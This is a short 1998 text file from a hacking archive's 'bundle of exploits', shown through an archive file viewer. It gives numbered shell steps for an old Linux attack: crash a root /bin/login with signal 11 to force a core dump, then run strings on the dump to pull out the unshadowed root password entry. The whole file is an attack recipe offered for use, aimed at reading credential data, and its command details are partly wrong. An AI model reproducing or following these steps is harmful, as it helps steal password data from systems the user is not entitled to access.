home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Hacking & Misc / bundle of exploits.sit / bundle of exploits / telnet_core.txt < prev    next >
Text File  |  1998-07-17  |  642b  |  14 lines

  1. In Linux you can get the part of the passwd file with the cores.
  2. 1)To do this open 2 telnet
  3. 2)on one of the telnet sessions get into your host and type /bin/login
  4. 3)then put as login root and a wrong passwd (you can do this with any account)
  5. leave it open
  6. 4)on the other telnet session type ps auwx | grep login
  7. 5)check the proccess number and then type kill -11 proccessname
  8. 6)on the other term you should get login: Segmentation fault (core dumped)
  9. 7)on the term you got that type strings core > woah
  10. that should get ya to the unshadowed porcion of the root login
  11.  
  12.  
  13.                                                   By InZoMnIaC & FoRmaTeZ
  14.